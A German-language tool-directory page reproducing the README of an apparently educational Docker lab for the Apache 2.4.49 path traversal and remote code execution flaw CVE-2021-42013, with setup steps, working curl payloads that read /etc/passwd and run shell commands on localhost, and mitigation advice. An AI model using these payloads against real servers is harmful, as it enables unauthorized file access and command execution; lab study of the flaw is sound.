Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
apache-cve-2021-42013-lab — Laborarbeit, die die Schwachstelle von Apache HTTP Server 2.4.49 (CVE-2021-42013) in einer Docker-Umgebung demonstriert. | Kitploit
Tools/GitHubGitHub/berraesen/apache-cve-2021-42013-lab
Container-SicherheitSchwachstellenanalyseExploitationWebanwendungs-ExploitationLernen & BildungLabs & Praxis
GitHubberraesen/apache-cve-2021-42013-lab

apache-cve-2021-42013-lab

Laborarbeit, die die Schwachstelle von Apache HTTP Server 2.4.49 (CVE-2021-42013) in einer Docker-Umgebung demonstriert.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 1 MonatNoch nicht geprüft

Apache HTTP Server 2.4.49 Path Traversal & Remote Code Execution (CVE-2021-42013)

Über das Projekt

In diesem Projekt habe ich die in Apache HTTP Server 2.4.49 enthaltene Schwachstelle CVE-2021-42013 in einer von mir mit Docker erstellten Laborumgebung demonstriert.

Ziel ist es, die Entstehung, Funktionsweise und Auswirkungen der Schwachstelle auf das System in einer kontrollierten Umgebung zu untersuchen.

Diese Arbeit dient ausschließlich Ausbildungs- und Laborzwecken.

Verwendete Technologien

  • Docker
  • Ubuntu 22.04
  • Apache HTTP Server 2.4.49
  • Bash
  • curl

Projektdateistruktur

root@kitploit:~
.
├── Dockerfile
├── index.html
└── README.md

Voraussetzungen

Vor dem Ausführen des Projekts müssen die folgenden Komponenten installiert sein.

  • Docker Desktop
  • Git (optional)

Installation

Laden Sie zunächst das Repository auf Ihren Computer herunter.

root@kitploit:~
git clone https://github.com/berraesen/apache-cve-2021-42013-lab.git

Wechseln Sie in den Ordner.

root@kitploit:~
cd apache-cve-2021-42013-lab

Erstellen Sie das Docker-Image.

root@kitploit:~
docker build -t apache-2.4.49-src .

Starten Sie den Container.

root@kitploit:~
docker run -d -p 8081:80 --name apache-src apache-2.4.49-src

Betreten Sie den Container.

root@kitploit:~
docker exec -it apache-src /bin/bash

Überprüfen Sie die Apache-Version.

root@kitploit:~
/usr/local/apache2/bin/httpd -v

Zum Verlassen des Containers:

root@kitploit:~
exit

Überprüfung der Apache-Module

Mit dem folgenden Befehl können Sie prüfen, ob das CGI-Modul aktiviert ist.

root@kitploit:~
docker exec -it apache-src /usr/local/apache2/bin/apachectl -M

Aktivieren des CGI-Moduls

root@kitploit:~
docker exec -it apache-src sed -i 's/#LoadModule cgid_module/LoadModule cgid_module/g' /usr/local/apache2/conf/httpd.conf

Starten Sie Apache anschließend neu.

root@kitploit:~
docker exec -it apache-src /usr/local/apache2/bin/apachectl restart

Zum Deaktivieren des CGI-Moduls:

root@kitploit:~
docker exec -it apache-src sed -i 's/LoadModule cgid_module/#LoadModule cgid_module/g' /usr/local/apache2/conf/httpd.conf

Führen Sie anschließend erneut einen Neustart aus.

Test der Schwachstelle

Path Traversal

root@kitploit:~
curl.exe -v --path-as-is "http://localhost:8081/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd"

Remote Code Execution

root@kitploit:~
curl.exe -v --path-as-is "http://localhost:8081/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" --data "echo; id"

Um weitere Systeminformationen anzuzeigen:

root@kitploit:~
curl.exe -s --path-as-is "http://localhost:8081/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" --data "echo; id; uname -a; whoami" -o -

Erwartetes Ergebnis

Nach Abschluss der Installation:

  • Apache 2.4.49 sollte erfolgreich laufen.
  • Bei aktiviertem CGI-Modul kann die Schwachstelle beobachtet werden.
  • Mithilfe von Path Traversal kann der Zugriff auf Systemdateien demonstriert werden.
  • Mit RCE lässt sich zeigen, dass Befehle auf dem Server ausgeführt werden können.

Funktionsweise der Schwachstelle

root@kitploit:~
İstemci (cURL)
      │
      ▼
Apache HTTP Server 2.4.49
      │
      ▼
URL Normalization Hatası
      │
      ▼
Path Traversal
      │
      ├──────────────► CGI Kapalı
      │                     │
      │                     ▼
      │             Dosya erişimi mümkün olabilir
      │
      ▼
CGI Aktif
      │
      ▼
/bin/sh çalıştırılabilir
      │
      ▼
Remote Code Execution (RCE)

Um das RCE-Szenario demonstrieren zu können, muss das Modul mod_cgi aktiviert sein.

Vorbeugung

Zur Behebung dieser Schwachstelle wird empfohlen, Apache HTTP Server auf Version 2.4.51 oder eine neuere Version zu aktualisieren. Zudem wird empfohlen, CGI zu deaktivieren, falls es nicht verwendet wird, und nur für erforderliche Verzeichnisse geeignete Zugriffsberechtigungen festzulegen.

Tool herunterladen